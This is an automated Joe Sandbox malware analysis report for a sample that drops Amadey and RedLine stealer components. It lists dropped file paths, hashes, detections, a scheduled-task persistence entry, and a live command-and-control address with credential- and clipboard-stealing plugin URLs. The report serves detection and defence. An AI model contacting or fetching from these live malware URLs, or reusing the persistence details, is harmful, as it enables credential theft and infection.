                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe62%ReversingLabsWin32.Trojan.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe49%ReversingLabsWin32.Trojan.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                            C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpoft0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe=0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll2%VirustotalBrowse
                            http://62.204.41.4/Gol478Ns/index.phpa0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpd0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpm320%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpi0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpn0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpion0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phps0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php5342a20%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php40%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php(l0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php9e5342a20%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpp0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpH0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php80%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpC0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpZI0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpa106e760%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exel0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpQ0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpR0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpix0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                            62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe#0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                            No contacted domains info
                            NameMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                            • Avira URL Cloud: malware
                            unknown
                            62.204.41.4/Gol478Ns/index.phptrue
                            • Avira URL Cloud: malware
                            low
                            http://62.204.41.4/Gol478Ns/index.phptrue
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Gol478Ns/index.phpoftmnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe=mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpdmnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpamnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpm32mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpnmnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpimnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpionmnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php5342a2mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpsmnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php4mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phppmnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php(lmnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php8mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpCmnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllsmnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php9e5342a2mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpHmnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exelmnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpa106e76mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpZImnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpixmnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpQmnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe#mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpRmnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            62.204.41.4
                            unknownUnited Kingdom
                            30798TNNET-ASTNNetOyMainnetworkFItrue
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:800795
                            Start date and time:2023-02-07 19:55:34 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:30
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 40.7% (good quality ratio 39%)
                            • Quality average: 85%
                            • Quality standard deviation: 24.3%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                            • HTTP Packets have been reduced
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, login.live.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, config.edge.skype.com, www-www.bing.com.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            19:57:03Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            19:57:03API Interceptor2455x Sleep call for process: mnolyk.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):226
                            Entropy (8bit):5.354940450065058
                            Encrypted:false
                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                            MD5:B10E37251C5B495643F331DB2EEC3394
                            SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                            SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                            SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):321
                            Entropy (8bit):5.355221377978991
                            Encrypted:false
                            SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                            MD5:03C5BA5FCE7124B503EA65EF522177C3
                            SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                            SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                            SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):346112
                            Entropy (8bit):7.6398500912394285
                            Encrypted:false
                            SSDEEP:6144:KGy+bnr+up0yN90QETK5opQV2ZCrf5aFld9BY4w8HJuJk:KMrWy90NQwYoPzBc4JuJk
                            MD5:E2A785D0666AFD7BBE63FAF32216A8AA
                            SHA1:CCE1A094E4CE3F073D2CF9693C20503534D3C4F4
                            SHA-256:51380BA1A929713AA9C1BE04FF7BCBB2782E51BA0689B6F86E91BBF41D81811B
                            SHA-512:EF9C4F63013AC69B8D9A875B17D9A7FC8EC4DC2E6608390804A83A160D5AF0DD5AAA9AB7638B10EBFE53AA5FDC7BDA346791A2A15F497B2CD486E4224DB93D0D
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 62%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................K.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):251392
                            Entropy (8bit):7.317039374404058
                            Encrypted:false
                            SSDEEP:6144:Dr0exvHrDLnQ1ik5HXrwCO5vFkb3NUmv30:Dr0ujDLoiYkxvFkDNUmv
                            MD5:CCFC1E2539F9382400217DF5AE6D1D8A
                            SHA1:A0F83E7D1B3C7C00B387F7963B1E01AF756E7D50
                            SHA-256:0D29057FDCACDD5442EC9C8901BDC7C36B69E10B0D8248C8534E0A3A4142C8F5
                            SHA-512:35CD1A17BA1FE5A5E934934D6C0FCBEC06D30E5EB584E089E6AF568175B4DD16E6A1CE0B3F2C9C53D36C7867D1D544259050D92D4C036FD40937AB569DAA4D5F
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 49%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......a............................_r............@.................................:.......................................\...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):11264
                            Entropy (8bit):4.97029807367379
                            Encrypted:false
                            SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                            MD5:7E93BACBBC33E6652E147E7FE07572A0
                            SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                            SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                            SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 82%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):4.621829903792328
                            Encrypted:false
                            SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                            MD5:1B7C22A214949975556626D7217E9A39
                            SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                            SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                            SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                            Malicious:false
                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                            Process:C:\Windows\SysWOW64\cacls.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):15
                            Entropy (8bit):3.240223928941852
                            Encrypted:false
                            SSDEEP:3:o3F:o1
                            MD5:509B054634B6DE74F111C3E646BC80FD
                            SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                            SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                            SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                            Malicious:false
                            Preview:processed dir:
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.809742458927501
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:537600
                            MD5:b16d53f153404f5825765f11ab2b6827
                            SHA1:cc5d6001624f836f5aa82e0178c6c2dc2fdac2c4
                            SHA256:128da440dc3448874960fb1eb8d34c283ba78f6517e20b57f2faa158d84a3fd0
                            SHA512:775b43cadf18aaa5319faded84739c974580d075edf96ab38156fdb2431f6d339bc6d85871e3ca574b30be22eac0c74804e3eb55654356835491577d635776b9
                            SSDEEP:12288:ZMrVy90wNpxJPhsvwmGAPzBU4NuJ+AlVH3Md1v:YyxNpxJ2LbBNNuJ+uVH30J
                            TLSH:E7B4024BE7EC8032D9B117B059F202C31536BE905B38939B229EAC5F58736A4E53177B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                            Icon Hash:f8e0e4e8ecccc870
                            Entrypoint:0x406a60
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:10
                            OS Version Minor:0
                            File Version Major:10
